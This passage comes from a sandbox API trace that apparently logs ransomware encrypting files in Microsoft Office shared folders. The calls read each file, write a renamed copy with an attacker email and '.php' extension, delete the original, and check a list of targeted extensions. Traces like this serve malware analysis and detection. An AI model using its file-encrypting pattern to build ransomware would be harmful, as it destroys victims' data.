(lpString="PREVIEW.GIF") returned 11 [0048.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.438] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=937) returned 1 [0048.438] CloseHandle (hObject=0x194) returned 1 [0048.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 0x20 [0048.438] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0048.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0048.438] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.438] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.438] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0049.033] GetLastError () returned 0x0 [0049.033] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x3a9, lpOverlapped=0x0) returned 1 [0049.035] WriteFile (in: hFile=0x208, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x3b0, lpOverlapped=0x0) returned 1 [0049.036] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.036] WriteFile (in: hFile=0x208, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.036] SetEndOfFile (hFile=0x208) returned 1 [0049.036] CloseHandle (hObject=0x208) returned 1 [0049.036] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.036] SetEndOfFile (hFile=0x194) returned 1 [0049.037] CloseHandle (hObject=0x194) returned 1 [0049.037] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.037] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sky\\preview.gif")) returned 1 [0049.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.038] lstrlenW (lpString=".doc") returned 4 [0049.038] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.038] lstrlenW (lpString=".docx") returned 5 [0049.038] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.038] lstrlenW (lpString=".pdf") returned 4 [0049.038] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.038] lstrlenW (lpString=".xls") returned 4 [0049.038] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.038] lstrlenW (lpString=".xlsx") returned 5 [0049.038] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.038] lstrlenW (lpString=".ppt") returned 4 [0049.038] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.038] lstrlenW (lpString=".zip") returned 4 [0049.038] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.038] lstrlenW (lpString=".rar") returned 4 [0049.038] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.038] lstrlenW (lpString=".bz2") returned 4 [0049.038] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.038] lstrlenW (lpString=".7z") returned 3 [0049.038] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.038] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.038] lstrlenW (lpString=".dbf") returned 4 [0049.039] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.039] lstrlenW (lpString=".1cd") returned 4 [0049.039] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.039] lstrlenW (lpString=".jpg") returned 4 [0049.039] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.039] lstrlenW (lpString=".doc") returned 4 [0049.039] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.039] lstrlenW (lpString=".docx") returned 5 [0049.039] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.039] lstrlenW (lpString=".pdf") returned 4 [0049.039] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.039] lstrlenW (lpString=".xls") returned 4 [0049.039] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.039] lstrlenW (lpString=".xlsx") returned 5 [0049.039] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.039] lstrlenW (lpString=".ppt") returned 4 [0049.039] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.039] lstrlenW (lpString=".zip") returned 4 [0049.039] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.039] lstrlenW (lpString=".rar") returned 4 [0049.039] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.039] lstrlenW (lpString=".bz2") returned 4 [0049.039] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.039] lstrlenW (lpString=".7z") returned 3 [0049.039] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.039] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.039] lstrlenW (lpString=".dbf") returned 4 [0049.039] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.040] lstrlenW (lpString=".1cd") returned 4 [0049.040] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.040] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\PREVIEW.GIF") returned 71 [0049.040] lstrlenW (lpString=".jpg") returned 4 [0049.040] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.040] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0049.040] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0049.040] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0049.040] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=4991) returned 1 [0049.040] CloseHandle (hObject=0x194) returned 1 [0049.040] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 0x20 [0049.041] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0049.041] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.041] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.041] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.318] GetLastError () returned 0x0 [0049.318] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x137f, lpOverlapped=0x0) returned 1 [0049.361] WriteFile (in: hFile=0x200, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x1380, lpOverlapped=0x0) returned 1 [0049.362] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.362] WriteFile (in: hFile=0x200, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.362] SetEndOfFile (hFile=0x200) returned 1 [0049.362] CloseHandle (hObject=0x200) returned 1 [0049.363] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.363] SetEndOfFile (hFile=0x194) returned 1 [0049.363] CloseHandle (hObject=0x194) returned 1 [0049.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.364] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 1 [0049.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.364] lstrlenW (lpString=".doc") returned 4 [0049.364] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.364] lstrlenW (lpString=".docx") returned 5 [0049.364] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.364] lstrlenW (lpString=".pdf") returned 4 [0049.364] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.364] lstrlenW (lpString=".xls") returned 4 [0049.364] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.364] lstrlenW (lpString=".xlsx") returned 5 [0049.364] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.364] lstrlenW (lpString=".ppt") returned 4 [0049.364] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.364] lstrlenW (lpString=".zip") returned 4 [0049.364] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.364] lstrlenW (lpString=".rar") returned 4 [0049.364] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.364] lstrlenW (lpString=".bz2") returned 4 [0049.364] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.364] lstrlenW (lpString=".7z") returned 3 [0049.364] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.364] lstrlenW (lpString=".dbf") returned 4 [0049.365] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.365] lstrlenW (lpString=".1cd") returned 4 [0049.365] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.365] lstrlenW (lpString=".jpg") returned 4 [0049.365] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.365] lstrlenW (lpString=".doc") returned 4 [0049.365] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.365] lstrlenW (lpString=".docx") returned 5 [0049.365] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.365] lstrlenW (lpString=".pdf") returned 4 [0049.365] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.365] lstrlenW (lpString=".xls") returned 4 [0049.365] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.365] lstrlenW (lpString=".xlsx") returned 5 [0049.365] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.365] lstrlenW (lpString=".ppt") returned 4 [0049.365] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.365] lstrlenW (lpString=".zip") returned 4 [0049.365] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.365] lstrlenW (lpString=".rar") returned 4 [0049.365] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.365] lstrlenW (lpString=".bz2") returned 4 [0049.365] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.365] lstrlenW (lpString=".7z") returned 3 [0049.365] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.365] lstrlenW (lpString=".dbf") returned 4 [0049.365] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.366] lstrlenW (lpString=".1cd") returned 4 [0049.366] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.366] lstrlenW (lpString=".jpg") returned 4 [0049.366] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.366] lstrcmpiW (lpString1=".CHM", lpString2=".php") returned -1 [0049.366] lstrlenW (lpString="VBOB6.CHM") returned 9 [0049.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0049.366] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=123956) returned 1 [0049.366] CloseHandle (hObject=0x194) returned 1 [0049.366] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 0x20 [0049.366] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.366] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0049.367] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.367] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.367] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.367] GetLastError () returned 0x0 [0049.367] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x1e434, lpOverlapped=0x0) returned 1 [0049.370] WriteFile (in: hFile=0x200, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x1e440, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x1e440, lpOverlapped=0x0) returned 1 [0049.373] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.373] WriteFile (in: hFile=0x200, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.373] SetEndOfFile (hFile=0x200) returned 1 [0049.373] CloseHandle (hObject=0x200) returned 1 [0049.373] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.373] SetEndOfFile (hFile=0x194) returned 1 [0049.374] CloseHandle (hObject=0x194) returned 1 [0049.375] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.375] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbob6.chm")) returned 1 [0049.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.375] lstrlenW (lpString=".doc") returned 4 [0049.375] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.375] lstrlenW (lpString=".docx") returned 5 [0049.375] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.375] lstrlenW (lpString=".pdf") returned 4 [0049.375] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.375] lstrlenW (lpString=".xls") returned 4 [0049.375] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.375] lstrlenW (lpString=".xlsx") returned 5 [0049.375] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.375] lstrlenW (lpString=".ppt") returned 4 [0049.375] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.375] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.375] lstrlenW (lpString=".zip") returned 4 [0049.375] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.375] lstrlenW (lpString=".rar") returned 4 [0049.375] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.376] lstrlenW (lpString=".bz2") returned 4 [0049.376] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.376] lstrlenW (lpString=".7z") returned 3 [0049.376] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.376] lstrlenW (lpString=".dbf") returned 4 [0049.376] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.376] lstrlenW (lpString=".1cd") returned 4 [0049.376] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.376] lstrlenW (lpString=".jpg") returned 4 [0049.376] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.376] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.376] lstrlenW (lpString=".doc") returned 4 [0049.376] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.376] lstrlenW (lpString=".docx") returned 5 [0049.376] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.376] lstrlenW (lpString=".pdf") returned 4 [0049.376] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.376] lstrlenW (lpString=".xls") returned 4 [0049.376] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.376] lstrlenW (lpString=".xlsx") returned 5 [0049.376] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.377] lstrlenW (lpString=".ppt") returned 4 [0049.377] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.377] lstrlenW (lpString=".zip") returned 4 [0049.377] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.377] lstrlenW (lpString=".rar") returned 4 [0049.377] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.377] lstrlenW (lpString=".bz2") returned 4 [0049.377] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.377] lstrlenW (lpString=".7z") returned 3 [0049.377] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.377] lstrlenW (lpString=".dbf") returned 4 [0049.377] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.377] lstrlenW (lpString=".1cd") returned 4 [0049.377] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.377] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBOB6.CHM") returned 70 [0049.377] lstrlenW (lpString=".jpg") returned 4 [0049.377] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.377] lstrcmpiW (lpString1=".CHM", lpString2=".php") returned -1 [0049.377] lstrlenW (lpString="VBUI6.CHM") returned 9 [0049.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: 